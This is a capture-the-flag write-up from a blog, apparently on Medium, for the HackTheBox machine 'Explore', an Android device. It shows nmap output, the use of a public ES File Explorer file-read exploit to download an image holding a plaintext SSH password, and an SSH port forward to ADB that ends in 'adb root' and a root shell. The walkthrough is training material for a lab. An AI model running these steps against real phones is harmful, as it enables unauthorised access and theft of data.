HackTheBox — Explore

As always we start with nmap to discover open ports.

Nmap Scan

nmap -sC -sV -oA explore 10.10.10.247

Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-02 15:57 EET
Nmap scan report for 10.10.10.247 (10.10.10.247)
Host is up (0.14s latency).

PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
35971/tcp closed unknown
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.80%I=7%D=7/2%Time=60DF1B3D%P=x86_64-pc-linux-gnu%r(NUL
SF:L,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
Service Info: Device: phone

Enumeration

First of all, lets look for exploits for these services (ES File Explorer & Bukkit JSONAPI). Found an arbitrary file read exploit for ( ES File Explorer 4.1.9.7.4) and didn’t find any other exploits, so lets just try it.

https://www.exploit-db.com/exploits/50070

By reading the exploit code, it’s sending a POST request with Content-Type: application/json header and a json POST data as {“command”: cmd} to http://10.10.10.247:59777/.

Lets first try the exploit manually before running the python script. Now visit http://10.10.10.247:59777/ intercept the request with burp or ZAP and send to repeater and edit the request as the exploit says. And we got a response with the device info.

Now that we understand how the exploit works, lets run the script because it parses the json response and make our life easier.

While enumeration i found that the ES File Explorer version is 4.1.9.7.3, that’s why the exploit works ( if there’s an exploit for a specific version, it may work on older versions too).

Initial Foothold

While trying every command i tried listPics and found interesting picture (creds.jpg).

I downloaded this picture using python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg and opened it. It has credentials in it.

kristi:Kr1sT!5h@Rp3xPl0r3!

Now lets ssh to the box with these creds and we are in.

Getting root

Doing some research on the ports we found earlier, Port 5555 is for Android Debug Bridge (ADB) connections. And found on hacktricks how to use this service to get root shell.

https://book.hacktricks.xyz/mobile-apps-pentesting/android-app-pentesting/adb-commands

POC:

  • First, We have to do port forwarding using ssh because the service is running on localhost only. ssh -p 2222 -L 1337:localhost:5555 kristi@10.10.10.247
  • That means 127.0.0.1:1337 ==> 10.10.10.247:5555
  • Connect to ADB service (port 5555) using adb tool. adb connect <IP>:<PORT>
  • Check if the phone is connected to your pc. adb devices
  • Now using adb tool we can do anything on the device, so to get root type adb root
  • to restart adbd daemon with root permissions.
  • Connect again to the ADB service. adb connect <IP>:<PORT>
  • Finally. adb shell

If you find it useful, kindly give me a respect

Linkedin | Github

--

--

--

I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Nigeria’s SEC Introduces New Crypto Regulatory Framework

Best and Secure Collaboration Tools Alternative to Zoom

CyberVein Weekly Report

Written testimony for California Senate Judicial Committee

Signal messaging app

Git clone authentication fail on Windows 10

How TEA Fixes the Internet

How to run a successful meeting with IT Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xEmbo

0xEmbo

I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.

More from Medium

HackTheBox — Previse

Tryhackme room based on game Evil Resident writeup: Biohazard

Backdoor Hackthebox Write-up| Backdoor Hackthebox Walkthrough

TryHackMe | CTF | Hackaish